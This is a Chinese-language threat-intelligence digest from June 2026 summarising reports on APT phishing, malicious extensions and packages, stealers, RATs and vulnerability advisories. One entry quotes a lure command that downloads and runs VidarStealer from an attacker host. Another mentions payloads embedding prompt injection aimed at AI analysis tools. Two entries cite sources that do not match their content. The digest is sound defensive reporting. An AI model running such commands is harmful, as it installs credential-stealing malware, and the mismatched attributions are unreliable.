披露时间：2026年6月10日

情报来源：https://mp.weixin.qq.com/s/jH60_sYtZjJZWtVc5d277g

相关信息：

360威胁情报中心监测到南亚背景的APT-C-08蔓灵花组织近期利用钓鱼网站发起攻击。攻击者搭建仿冒163邮箱的登录页面，同时设置下载页面诱导用户下载带密码的ZIP压缩包，内含VBS脚本Requirement_Letter.vbs。该脚本执行后会检测运行环境，将自身复制至AppData目录并命名为wupdate_helper.vbs，通过注册表启动项、计划任务和开始菜单实现多重持久化。脚本进一步释放两个PowerShell核心模块：vps_transfer.ps1负责窃取敏感信息，vps_c2.ps1实现远程命令执行与控制，同时打开诱饵文档迷惑用户，最后自删除以消除痕迹。

披露时间：2026年6月9日

情报来源：https://blog.alyac.co.kr/5761

相关信息：

Alyac安全团队发现一起Kimsuky组织针对国内企业信息安全负责人的鱼叉式钓鱼攻击。攻击者伪装成普通客户，以“个人疑似信息泄露，请确认”为由与目标反复邮件沟通，建立信任后发送恶意文件。首次发送的链接被安全产品拦截后，攻击者谎称为误报，并将同一恶意文件以加密ZIP附件形式重新发送。压缩包内含伪装成客户名单的LNK文件，用户执行后显示正常的Excel或PDF诱饵文档，同时后台释放载荷。样本分为两类：第一类利用Dropbox API作为C2，通过RC4解密JavaScript loader，最终PowerShell收集系统信息及进程列表并发送至攻击者Dropbox，同时注册伪装成Intel网卡驱动的计划任务（每16分钟执行）；另一类通过VBS脚本写入启动文件夹实现持久化，使用自定义凯撒密码解密命令，从HTTPS C2下载bat文件并以14分钟循环执行。分析表明，此活动与Kimsuky典型手法高度吻合，包括多阶段LNK渗透、利用云服务及自定义加密、针对韩语诱饵等。

披露时间：2026年6月9日

情报来源：https://yeethsecurity.com/blog/2026-06-09-jupyter-powerdev-backdoor

相关信息：

Yeeth Security在VS Code Marketplace中发现三个恶意扩展，伪装成Jupyter Notebook工具，实际是与DPRK有关联的复杂后门。扩展安装后自动激活，无需用户交互。其架构包含JavaScript层用于C2通信，通过伪装成金融API的Azure代理获取Microsoft Graph令牌，再与SharePoint站点交互，利用三个列表分别管理受害主机注册、命令队列和响应外泄。Windows端携带使用Costura.Fody打包的.NET可执行文件，集成Roslyn脚本API，可动态编译执行任意C#代码；Linux和macOS端则使用Python脚本。所有通信经AES-256-CBC加密，扩展内字符串同样加密。三个扩展共享同一个SharePoint站点GUID和C2通道密钥，确认为同一攻击者。该技术模式与朝鲜Lazarus组织的Contagious Interview（跨平台JS+Python）和DreamLoader（Graph API + SharePoint）高度重叠。

披露时间：2026年6月8日

情报来源：https://www.trendmicro.com/en_us/research/26/f/old-winrar-flaw-fuels-attacks-on-ukraine.html

相关信息：

趋势科技披露，乌克兰正遭受多个俄罗斯关联攻击组织利用旧版WinRAR漏洞CVE-2025-8088的持续攻击。该漏洞是路径遍历漏洞，于2025年7月已在WinRAR 7.13中修复，但直至2026年4月，攻击者仍在生产新利用样本。其中，SHADOW-EARTH-066（CERT-UA追踪为UAC-0226）利用该漏洞投递升级版GIFTEDCROOK窃取器result.dll，通过恶意RAR释放LNK文件和PowerShell加载器，最终在内存中解密执行DLL，窃取浏览器密码、Cookie及35类文档，并通过HTTPS外传至专用C2服务器。另一组织Earth Dahu（Gamaredon）则利用同一漏洞向启动目录写入恶意HTA文件，用户登录后mshta.exe执行HTA，进而通过Cloudflare Workers代理加载VBScript脚本，部署间谍模块。两个组织均使用法庭传票、国防部文件等诱饵，且其攻击链均依赖WinRAR未受集中管理的弱点，导致大量终端长期未打补丁。

披露时间：2026年6月8日

情报来源：https://www.proofpoint.com/us/blog/threat-insight/dont-fear-repo-unkdeaddrop-phishing-campaign-targets-developers-steal

相关信息：

Proofpoint发现一起疑似朝鲜的UNK_DeadDrop钓鱼活动，针对金融、加密货币、科技等行业的开发者。攻击者冒充招聘或代码审查，通过邮件发送GitHub仓库链接，内容伪装成加密货币平台、漏洞库、Foundry测试或AI支付项目。受害者克隆仓库并在VS Code或Cursor中打开时，利用tasks.json的自动执行特性触发恶意脚本：Cursor中静默执行，VS Code需用户确认信任。Linux/macOS链执行基于Overlord框架的Go语言RAT，通过WebSocket与C2通信，窃取浏览器凭证、加密货币钱包及系统钥匙串，并使用VSIX扩展实现持久化。Windows链完全运行在编辑器Electron进程中，利用Node.js窃取钱包和浏览器凭证（含DPAPI和App-Bound Encryption绕过），无持久化。攻击者使用Namecheap注册域名，部分假公司网站托管于Vercel。该活动与Contagious Interview相似但技术更成熟，可能是其演进版本。

披露时间：2026年6月9日

情报来源：https://www.reversinglabs.com/blog/social-media-attacks-phishing

相关信息：

ReversingLabs发现攻击者利用TikTok和Instagram Reels等短视频平台，通过两种手法进行钓鱼攻击。第一种手法是创建伪装成官方支持账号的“恶意教程”账户，使用AI语音和高质量视频演示如何免费获取Spotify Premium等付费软件，诱导用户在PowerShell中执行iex irm msget.run/spotify等命令，从而下载VidarStealer信息窃取器。第二种手法则通过发布模糊的“免费使用高级功能”短视频，引导用户评论互动，再私信发送恶意链接或跳转至第三方网站，这些网站通常要求用户完成调查任务才提供下载，实际可能无真实载荷但存在风险。这些短视频利用算法推荐机制，通过大量点赞、收藏和分享扩散，且攻击者可删除警示评论，平台报告处理不及时。最终载荷经分析为VidarStealer，是一款长期存在的恶意软件即服务窃取器，可窃取凭证、财务信息和令牌。

披露时间：2026年6月8日

情报来源：https://www.microsoft.com/en-us/security/blog/2026/06/08/ai-brands-as-bait-how-threat-actors-are-using-the-ai-hype-in-social-engineering/

相关信息：

微软威胁情报团队发现，攻击者正利用公众对AI技术的关注，以ChatGPT、Claude、DeepSeek、Copilot等AI品牌为诱饵，发起大规模社会工程攻击。这些攻击包括：冒充ChatGPT Plus发送钓鱼邮件，诱骗用户更新支付方式并窃取信用卡信息及个人信息；冒充Claude的钓鱼活动，通过带附件的邮件和链式重定向，采用中间人攻击手法窃取凭证和访问令牌；利用“Awesome AI Windows Plugin”等虚假AI插件进行恶意广告分发，通过需要用户点击确认的界面规避沙箱检测，最终投放Vidar窃取器，且样本使用伪造的代码签名；在GitHub上创建伪造的DeepSeek V4仓库，利用SEO优化和真实基准数据增强可信度，诱导开发者下载带后门的安装包，同样投递Vidar窃取器，且同一载荷文件被重命名后冒充多个AI产品。这些活动不涉及AI服务本身被入侵，而是纯粹滥用品牌名称。

披露时间：2026年6月8日

情报来源：https://gbhackers.com/pink-hacking-group-targets-enterprises/

相关信息：

Palo Alto Networks发现一个名为Pink的新勒索品牌，主要针对企业用户窃取云存储凭证并绕过多因素认证。该组织自2026年5月31日上线泄露网站，攻击链始于语音钓鱼：攻击者冒充IT支持或安全人员，通过电话制造紧迫感，诱导用户点击仿冒企业单点登录和云存储门户的钓鱼页面。如果目标启用了MFA，攻击者会采用推送疲劳轰炸或实时拦截一次性验证码等方式获取第二因素凭证。进入受害者云环境后，Pink系统性地搜索共享驱动器、协作平台和归档邮件，窃取敏感文档、知识产权及备份数据。泄露网站上的公开证据既用于施压受害者支付赎金，也用于宣传其能力以招募附属成员。该组织不依赖大规模批量钓鱼，而是聚焦人工定向社会工程学，显示出对现代企业工作流程的深度理解。

披露时间：2026年6月8日

情报来源：https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious

相关信息：

Socket发现Miasma/Shai-Hulud供应链攻击扩展至PyPI生态，其新一轮Shai-Hulud/Miasma/Hades供应链攻击新增23个恶意包。攻击者通过三种方式投递载荷：利用.pth启动钩子在Python启动时下载Bun并执行混淆的_index.js窃取器；在生物信息学包（如embiggen、ensmallen）中植入编译的.abi3.so原生扩展，导入时触发恶意代码；langchain-core-mcp变体则不在包内捆绑_index.js，而是通过.pth文件遍历sys.path寻找该文件并用Bun执行，实现加载器与载荷分离。窃取器针对GitHub、npm、PyPI、云凭证、K8s服务账户、SSH密钥、Docker配置及AI开发工具敏感信息。载荷头部包含伪造的提示注入内容，旨在干扰AI辅助分析工具。该活动已影响471个制品（npm 411个，PyPI 60个）

披露时间：2026年6月8日

情报来源：https://www.stepsecurity.io/blog/pythagora-io-gpt-pilot-compromised-on-github-shai-hulud-credential-stealer-blocked-by-python-linter

相关信息：

2026年6月8日，攻击者入侵了AI开发工具gpt-pilot项目联合创始人LeonOstrez的GitHub账户。由于main分支未配置保护规则，攻击者强制推送了包含恶意代码的提交，试图向项目中注入Shai-Hulud蠕虫变种。该恶意载荷包括_hooks.py、runtime.bin及修改的__init_.py，可窃取AWS密钥、npm令牌、GitHub secrets、Kubernetes服务账户、Vault令牌及SSH密钥，通过GitHub commit消息作为隐蔽C2通道，利用窃取令牌创建仓库外泄数据，还能滥用Sigstore发布带伪造SLSA证明的恶意npm包，并在Claude Code和VS Code中植入持久化钩子。攻击者将恶意commit回填日期至2025年8月以躲避审查。然而，项目CI流水线中的ruff Python代码检查工具两次阻止了攻击：第一次因代码格式不符合ruff format规则，第二次因导入语句位置违反PEP8规范。攻击者修复后仍失败，最终放弃。社区通过Issue #1181报告但被删除，推测由同一被入侵账户操作。

披露时间：2026年6月10日

情报来源：https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/

相关信息：

Group-IB披露了SilabRAT，这是一款以恶意软件即服务形式出售的远程访问木马，由俄语开发者o1oo1在暗网论坛销售，月费5000美元。SilabRAT具备隐藏虚拟网络计算（HVNC）能力，可实现不被用户察觉的远程控制；同时支持浏览器配置文件克隆，以绕过基于设备指纹和IP绑定的会话保护。其凭证窃取模块可提取浏览器存储的登录信息、Cookie及加密货币钱包数据，并利用从受害主机收集的密码自动破解加密钱包。为绕过Chrome 127及以上版本的App-Bound Encryption，SilabRAT使用COM提权技术调用GoogleChromeElevationService解密密钥。此外，该RAT还提供键盘记录、剪贴板监控、远程桌面、UAC绕过及计划任务持久化等功能。攻击者通过ClickFix或钓鱼邮件分发载荷，其C2面板采用ChaCha20-Poly1305加密通信，支持多级附属访问。开发者同时销售AsmCrypt混淆器以增强逃避检测能力。SilabRAT已在实际攻击中被部署，部分买家报告超过90%的感染机器保持在线超过一个月。

披露时间：2026年6月9日

情报来源：https://www.zscaler.com/blogs/security-research/technical-analysis-mltbackdoor

相关信息：

Zscaler ThreatLabz发现了新型恶意软件MLTBackdoor，可能被勒索软件团伙用于建立初始据点。该恶意软件通过ClickFix感染链传播，使用混合布尔算术和控制流扁平化技术进行重度混淆，结合栈字符串和API哈希对抗静态分析，并通过间接系统调用绕过用户态钩子。MLTBackdoor支持文件下载上传、目录列表、删除重命名等内置命令，最强大的是具备Beacon对象文件加载器，可动态扩展后渗透能力。网络通信使用椭圆曲线Diffie-Hellman密钥交换和AES-256-GCM加密，固定路径/api/v1/telemetry和用户代理伪装流量，并内置基于日期的域名生成算法以在主C2不可达时保持控制。它还集成了十种反分析检测（虚拟机、调试器、运行进程名、窗口标题、内存大小、CPU核心数等），将结果以位掩码形式在初始握手时发送给C2。

披露时间：2026年6月4日

情报来源：https://www.mcafee.com/blogs/other-blogs/mcafee-labs/weedhack-minecraft-malware-as-a-service-campaign-research/

相关信息：

Sansec发现一起新型Magecart攻击，攻击者利用Google Tag Manager和Stripe API作为恶意基础设施。恶意载荷通过真实GTM容器植入电商网站，在结账页面从攻击者的Stripe客户元数据中动态获取窃取器代码。该窃取器劫持结账按钮，捕获信用卡号、有效期、CVV及完整账单信息，经XOR编码后暂存于localStorage。随后，同一加载器定期读取该数据，通过Stripe API将窃取信息以虚假客户形式上传至攻击者的Stripe账户。整个过程完全依赖api.stripe.com和google tagmanager.com等受信任域名，从而绕过内容安全策略和网络过滤。另有变种使用Firestore作为类似通道。攻击者使用Stripe测试模式密钥，将Stripe和Firestore作为免费代码托管和窃取数据的中转站。

披露时间：2026年6月4日

情报来源：https://blog.qualys.com/qualys-insights/2026/06/02/hazybeacon-aws-lambda-function-url-command-control-abuse

相关信息：

LAC披露了一起针对日本组织的攻击活动，攻击者通过伪装成人事的鱼叉式钓鱼邮件，诱导受害者下载恶意LNK或EXE文件，进而释放PXDropper。PXDropper内置PoisonX内核驱动和10FXRAT远控。PoisonX驱动利用BYOVD技术，可强制终止Microsoft Defender、CrowdStrike等43种安全产品的进程，并通过劫持系统网络驱动隐藏自身进程及C2通信。10FXRAT为模块化远控，支持系统指纹收集、远程命令执行、SOCKS5隧道及动态加载插件，插件功能涵盖键盘记录、剪贴板监视、加密货币钱包窃取、Telegram会话劫持及隐藏桌面控制。该远控使用DJB2哈希动态解析API，C2通信采用自定义TCP协议（魔数“10FX”）。2026年5月的变种改用合法签名的Enelo64.sys或procexp.sys驱动执行BYOVD。攻击者还通过CPU核心数、内存大小、虚拟机注册表等多项指标进行反沙箱评分。

披露时间：2026年6月10日

情报来源：https://mp.weixin.qq.com/s/PL9uKux-UUa-vcTzxWMBXw

相关信息：

微软于2026年6月补丁日发布了206个漏洞的修复程序，涉及Windows图形组件、远程桌面客户端、Windows部署服务、HTTP.sys、Hyper-V、Microsoft Office、Outlook、Word、Copilot等多个产品。其中35个被评定为紧急漏洞，11个为重要漏洞。值得关注的漏洞类型包括远程代码执行、权限提升、信息泄露、安全功能绕过及拒绝服务等。15个漏洞被微软标记为“已遭利用或更易被利用”，包括HTTP.sys远程代码执行及拒绝服务漏洞、BitLocker安全功能绕过、SharePoint Server欺骗漏洞、NTLM欺骗、图形组件及内核权限提升等。攻击者可利用这些漏洞实现网络远程代码执行、本地权限提升或信息窃取，危害较大。官方已提供安全更新，用户应通过Windows自动更新或手动下载补丁尽快修复。

披露时间：2026年6月8日

情报来源：https://blog.checkpoint.com/security/check-point-releases-important-hotfix-for-vulnerabilities-in-deprecated-ikev1-vpn-protocol/

相关信息：

Check Point发布安全公告，披露了CVE-2026-50751严重漏洞，影响使用已废弃IKEv1协议的远程访问VPN和移动访问产品。该漏洞存在于证书验证逻辑中，攻击者可绕过用户认证建立VPN会话，无需有效密码。目前已在全球数十个组织中观察到积极利用，其中一例已确认与Qilin勒索软件分支相关。Check Point利用其AI代码安全平台BLAST进行扩展审查时，还发现了另一个相关漏洞CVE-2026-50752，可能允许中间人攻击干扰站点到站点VPN通信，但尚未发现野外利用。受影响产品包括R80.20、R80.40、R81.10、R81.20、R82等多个版本。攻击者使用Kaupo Cloud HK、Shock Hosting、Vultr等VPS基础设施，并可能利用Tox协议通信，部分攻击中受害者地域与VPS地理位置相关。